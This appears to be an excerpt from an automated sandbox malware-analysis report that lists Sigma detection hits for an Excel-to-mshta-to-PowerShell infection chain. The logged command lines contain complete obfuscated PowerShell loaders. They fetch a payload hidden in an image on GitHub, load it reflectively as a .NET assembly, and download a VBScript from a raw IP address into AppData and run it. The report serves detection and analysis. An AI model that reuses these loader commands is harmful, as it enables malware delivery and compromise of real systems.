                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                  Sigma detected: File With Uncommon Extension Created By An Office Application
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\networkthinkinggreatthingstobeenough[1].hta
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Sigma detected: Potentially Suspicious PowerShell Child Processes
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 3860, ProcessName: wscript.exe
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICA
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3184, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3456, ProcessName: mshta.exe
                  Sigma detected: Suspicious PowerShell Parameter Substring
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; 